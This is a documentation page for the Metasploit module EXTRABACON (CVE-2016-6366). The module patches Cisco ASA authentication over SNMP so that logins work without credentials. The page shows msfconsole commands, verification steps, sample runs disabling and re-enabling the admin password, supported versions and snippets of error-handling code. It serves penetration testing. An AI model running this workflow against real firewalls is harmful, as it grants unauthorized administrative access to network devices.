Cisco ASA Authentication Bypass (EXTRABACON) - Metasploit


This page contains detailed information about how to use the auxiliary/admin/networking/cisco_asa_extrabacon metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: Cisco ASA Authentication Bypass (EXTRABACON)
Module: auxiliary/admin/networking/cisco_asa_extrabacon
Source code: modules/auxiliary/admin/networking/cisco_asa_extrabacon.rb
Disclosure date: -
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 161
List of CVEs: CVE-2016-6366

This module is also known as EXTRABACON.

This module patches the authentication functions of a Cisco ASA to allow uncredentialed logins. Uses improved shellcode for payload.

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

msf > use auxiliary/admin/networking/cisco_asa_extrabacon
msf auxiliary(cisco_asa_extrabacon) > show targets
    ... a list of targets ...
msf auxiliary(cisco_asa_extrabacon) > set TARGET target-id
msf auxiliary(cisco_asa_extrabacon) > show options
    ... show and set options ...
msf auxiliary(cisco_asa_extrabacon) > exploit

Required Options

  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base

Vulnerable Application

General notes

This is using improved shellcode, has less stages than the Equation Group version making it more reliable. This makes the SNMP payload packet ~150 less bytes. Also, the leaked version only supports 8.x, we have it working on 9.x versions.

To add more version specific offsets, more details and a Lina file offset finder are available at:

https://github.com/RiskSense-Ops/CVE-2016-6366

Partial list of supported versions

All of the leaked versions are available in the module

  • 8.x
  • 8.0(2)
  • 8.0(3)
  • 8.0(3)6
  • 8.0(4)
  • 8.0(4)32
  • 8.0(5)
  • 8.2(1)
  • 8.2(2)
  • 8.2(3)
  • 8.2(4)
  • 8.2(5)
  • 8.2(5)33 *
  • 8.2(5)41 *
  • 8.3(1)
  • 8.3(2)
  • 8.3(2)39 *
  • 8.3(2)40 *
  • 8.3(2)-npe * **
  • 8.4(1)
  • 8.4(2)
  • 8.4(3)
  • 8.4(4)
  • 8.4(4)1 *
  • 8.4(4)3 *
  • 8.4(4)5 *
  • 8.4(4)9 *
  • 8.4(6)5 *
  • 8.4(7) *
  • 9.x
  • 9.0(1) *
  • 9.1(1)4 *
  • 9.2(1) *
  • 9.2(2)8 *
  • 9.2(3) *
  • 9.2(4) *
  • 9.2(4)13 *

    • * new version support not part of the original Shadow Brokers leak

    ** We currently can't distinguish between normal and NPE versions from the SNMP strings. We've commented out the NPE offsets, as NPE is very rare (it is for exporting to places where encryption is crappy), but in the future, we'd like to incorporate these versions. Perhaps as a bool option?

    Verification Steps

    • Start msfconsole
    • use auxiliary/admin/networking/cisco_asa_extrabacon
    • set RHOST x.x.x.x
    • check
    • run
    • ssh [email protected], you will not need a valid password
    • set MODE pass-enable
    • run
    • ssh [email protected], ensure fake password does not work

    Scenarios

    Checking for a vulnerable version

    msf > use auxiliary/admin/networking/cisco_asa_extrabacon
msf auxiliary(cisco_asa_extrabacon) > set rhost 192.168.1.1
rhost => 192.168.1.1
msf auxiliary(cisco_asa_extrabacon) > check

[+] Payload for Cisco ASA version 8.2(1) available!
[*] 192.168.1.1:161 The target appears to be vulnerable.

    Disabling administrative password

      msf auxiliary(cisco_asa_extrabacon) > set
set ACTION            set ConsoleLogging    set Prompt            set RHOST             set TimestampOutput
set CHOST             set LogLevel          set PromptChar        set RPORT             set VERBOSE
set COMMUNITY         set MODE              set PromptTimeFormat  set SessionLogging    set VERSION
set CPORT             set MinimumRank       set RETRIES           set TIMEOUT           set WORKSPACE
msf auxiliary(cisco_asa_extrabacon) > set MODE pass-
  set MODE pass-disable  set MODE pass-enable
msf auxiliary(cisco_asa_extrabacon) > set MODE pass-disable
MODE => pass-disable
msf auxiliary(cisco_asa_extrabacon) > run

[*] Building pass-disable payload for version 8.2(1)...
  [*] Sending SNMP payload...
  [+] Clean return detected!
[!] Don't forget to run pass-enable after logging in!
[*] Auxiliary module execution completed

    Re-enabling administrative password

    msf auxiliary(cisco_asa_extrabacon) > set MODE pass-enable
MODE => pass-enable
msf auxiliary(cisco_asa_extrabacon) > run

[*] Building pass-enable payload for version 8.2(1)...
  [*] Sending SNMP payload...
  [+] Clean return detected!
[*] Auxiliary module execution completed

Go back to menu.

Msfconsole Usage

Here is how the admin/networking/cisco_asa_extrabacon auxiliary module looks in the msfconsole:

msf6 > use auxiliary/admin/networking/cisco_asa_extrabacon

msf6 auxiliary(admin/networking/cisco_asa_extrabacon) > show info

       Name: Cisco ASA Authentication Bypass (EXTRABACON)
     Module: auxiliary/admin/networking/cisco_asa_extrabacon
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Sean Dillon <[email protected]>
  Zachary Harding <[email protected]>
  Nate Caroe <[email protected]>
  Dylan Davis <[email protected]>
  William Webb <[email protected]>
  Jeff Jarmoc <jjarmoc>
  Equation Group
  Shadow Brokers

Available actions:
  Name          Description
  ----          -----------
  PASS_DISABLE  Disable password authentication.
  PASS_ENABLE   Enable password authentication.

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  ASAVER     auto             no        Target ASA version (default autodetect) (Accepted: auto, 9.2(4)13, 9.2(4), 9.2(3), 9.2(2)8, 9.2(1), 9.1(1)4, 9.0(1), 8.4(7), 8.4(6)5, 8.4(4)9, 8.4(4)5, 8.4(4)3, 8.4(4)1, 8.4(4), 8.4(3), 8.4(2), 8.4(1), 8
                                        .3(2)40, 8.3(2)39, 8.3(2), 8.3(1), 8.2(5)41, 8.2(5)33, 8.2(5), 8.2(4), 8.2(3), 8.2(2), 8.2(1), 8.0(5), 8.0(4)32, 8.0(4), 8.0(3)6, 8.0(3), 8.0(2))
  COMMUNITY  public           yes       SNMP Community String
  RETRIES    1                yes       SNMP Retries
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      161              yes       The target port (UDP)
  TIMEOUT    1                yes       SNMP Timeout

Description:
  This module patches the authentication functions of a Cisco ASA to 
  allow uncredentialed logins. Uses improved shellcode for payload.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2016-6366
  https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp
  https://github.com/RiskSense-Ops/CVE-2016-6366

Also known as:
  EXTRABACON

Module Options

This is a complete list of options available in the admin/networking/cisco_asa_extrabacon auxiliary module:

msf6 auxiliary(admin/networking/cisco_asa_extrabacon) > show options

Module options (auxiliary/admin/networking/cisco_asa_extrabacon):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   ASAVER     auto             no        Target ASA version (default autodetect) (Accepted: auto, 9.2(4)13, 9.2(4), 9.2(3), 9.2(2)8, 9.2(1), 9.1(1)4, 9.0(1), 8.4(7), 8.4(6)5, 8.4(4)9, 8.4(4)5, 8.4(4)3, 8.4(4)1, 8.4(4), 8.4(3), 8.4(2), 8.4(1),
                                         8.3(2)40, 8.3(2)39, 8.3(2), 8.3(1), 8.2(5)41, 8.2(5)33, 8.2(5), 8.2(4), 8.2(3), 8.2(2), 8.2(1), 8.0(5), 8.0(4)32, 8.0(4), 8.0(3)6, 8.0(3), 8.0(2))
   COMMUNITY  public           yes       SNMP Community String
   RETRIES    1                yes       SNMP Retries
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      161              yes       The target port (UDP)
   TIMEOUT    1                yes       SNMP Timeout

Auxiliary action:

   Name          Description
   ----          -----------
   PASS_DISABLE  Disable password authentication.

Advanced Options

Here is a complete list of advanced options supported by the admin/networking/cisco_asa_extrabacon auxiliary module:

msf6 auxiliary(admin/networking/cisco_asa_extrabacon) > show advanced

Module advanced options (auxiliary/admin/networking/cisco_asa_extrabacon):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   CHOST                       no        The local client address
   CPORT                       no        The local client port
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Auxiliary Actions

This is a list of all auxiliary actions that the admin/networking/cisco_asa_extrabacon module can do:

msf6 auxiliary(admin/networking/cisco_asa_extrabacon) > show actions

Auxiliary actions:

   Name          Description
   ----          -----------
   PASS_DISABLE  Disable password authentication.
   PASS_ENABLE   Enable password authentication.

Evasion Options

Here is the full list of possible evasion options supported by the admin/networking/cisco_asa_extrabacon auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(admin/networking/cisco_asa_extrabacon) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages

This module may fail with the following error messages:

Error Messages

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Error: Unable to retrieve version information

Here is a relevant code snippet related to the "Error: Unable to retrieve version information" error message:

106:	
107:	  def check
108:	    begin
109:	      vers_string = retrieve_asa_version
110:	    rescue ::StandardError
111:	      print_error('Error: Unable to retrieve version information')
112:	      return Exploit::CheckCode::Unknown
113:	    end
114:	
115:	    if @offsets[vers_string]
116:	      print_good("Payload for Cisco ASA version #{vers_string} available!")

Received Cisco ASA version <VERS_STRING>, but no payload available

Here is a relevant code snippet related to the "Received Cisco ASA version <VERS_STRING>, but no payload available" error message:

115:	    if @offsets[vers_string]
116:	      print_good("Payload for Cisco ASA version #{vers_string} available!")
117:	      return Exploit::CheckCode::Appears
118:	    end
119:	
120:	    print_warning("Received Cisco ASA version #{vers_string}, but no payload available")
121:	    return Exploit::CheckCode::Detected
122:	  end
123:	
124:	  def build_payload(vers_string, mode)
125:	    # adds offsets to the improved shellcode

Don't forget to run PASS_ENABLE after logging in!

Here is a relevant code snippet related to the "Don't forget to run PASS_ENABLE after logging in!" error message:

177:	    response = snmp.get_bulk(0, 1, [SNMP::VarBind.new(payload)])
178:	
179:	    if response.varbind_list
180:	      print_good('Clean return detected!')
181:	      if action.name == 'PASS_DISABLE'
182:	        print_warning("Don't forget to run PASS_ENABLE after logging in!")
183:	        print_warning('  set ACTION PASS_ENABLE')
184:	      end
185:	    end
186:	  rescue ::Rex::ConnectionError
187:	    print_error('Connection Error: Is the target up?')

set ACTION PASS_ENABLE

Here is a relevant code snippet related to the "set ACTION PASS_ENABLE" error message:

178:	
179:	    if response.varbind_list
180:	      print_good('Clean return detected!')
181:	      if action.name == 'PASS_DISABLE'
182:	        print_warning("Don't forget to run PASS_ENABLE after logging in!")
183:	        print_warning('  set ACTION PASS_ENABLE')
184:	      end
185:	    end
186:	  rescue ::Rex::ConnectionError
187:	    print_error('Connection Error: Is the target up?')
188:	  rescue ::SNMP::RequestTimeout

Connection Error: Is the target up?

Here is a relevant code snippet related to the "Connection Error: Is the target up?" error message:

182:	        print_warning("Don't forget to run PASS_ENABLE after logging in!")
183:	        print_warning('  set ACTION PASS_ENABLE')
184:	      end
185:	    end
186:	  rescue ::Rex::ConnectionError
187:	    print_error('Connection Error: Is the target up?')
188:	  rescue ::SNMP::RequestTimeout
189:	    print_error('SNMP Error: Request Timeout, Cisco ASA may have crashed :/')
190:	  rescue ::SNMP::UnsupportedVersion
191:	    print_error('SNMP Error: Version 2c is not supported by target.')
192:	  rescue ::NoMethodError

SNMP Error: Request Timeout, Cisco ASA may have crashed :/

Here is a relevant code snippet related to the "SNMP Error: Request Timeout, Cisco ASA may have crashed :/" error message:

184:	      end
185:	    end
186:	  rescue ::Rex::ConnectionError
187:	    print_error('Connection Error: Is the target up?')
188:	  rescue ::SNMP::RequestTimeout
189:	    print_error('SNMP Error: Request Timeout, Cisco ASA may have crashed :/')
190:	  rescue ::SNMP::UnsupportedVersion
191:	    print_error('SNMP Error: Version 2c is not supported by target.')
192:	  rescue ::NoMethodError
193:	    print_error("Error: No payload available for version #{vers_string}")
194:	  rescue ::Interrupt

SNMP Error: Version 2c is not supported by target.

Here is a relevant code snippet related to the "SNMP Error: Version 2c is not supported by target." error message:

186:	  rescue ::Rex::ConnectionError
187:	    print_error('Connection Error: Is the target up?')
188:	  rescue ::SNMP::RequestTimeout
189:	    print_error('SNMP Error: Request Timeout, Cisco ASA may have crashed :/')
190:	  rescue ::SNMP::UnsupportedVersion
191:	    print_error('SNMP Error: Version 2c is not supported by target.')
192:	  rescue ::NoMethodError
193:	    print_error("Error: No payload available for version #{vers_string}")
194:	  rescue ::Interrupt
195:	    raise $ERROR_INFO
196:	  rescue ::StandardError => e

Error: No payload available for version <VERS_STRING>

Here is a relevant code snippet related to the "Error: No payload available for version <VERS_STRING>" error message:

188:	  rescue ::SNMP::RequestTimeout
189:	    print_error('SNMP Error: Request Timeout, Cisco ASA may have crashed :/')
190:	  rescue ::SNMP::UnsupportedVersion
191:	    print_error('SNMP Error: Version 2c is not supported by target.')
192:	  rescue ::NoMethodError
193:	    print_error("Error: No payload available for version #{vers_string}")
194:	  rescue ::Interrupt
195:	    raise $ERROR_INFO
196:	  rescue ::StandardError => e
197:	    print_error("Error: #{e.class} #{e} #{e.backtrace}")
198:	  ensure

Error: <E.CLASS> <E> <E.BACKTRACE>

Here is a relevant code snippet related to the "Error: <E.CLASS> <E> <E.BACKTRACE>" error message:

192:	  rescue ::NoMethodError
193:	    print_error("Error: No payload available for version #{vers_string}")
194:	  rescue ::Interrupt
195:	    raise $ERROR_INFO
196:	  rescue ::StandardError => e
197:	    print_error("Error: #{e.class} #{e} #{e.backtrace}")
198:	  ensure
199:	    disconnect_snmp
200:	  end
201:	
202:	  def retrieve_asa_version

Go back to menu.

References

See Also

Check also the following modules related to this module:

Authors

Version

This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.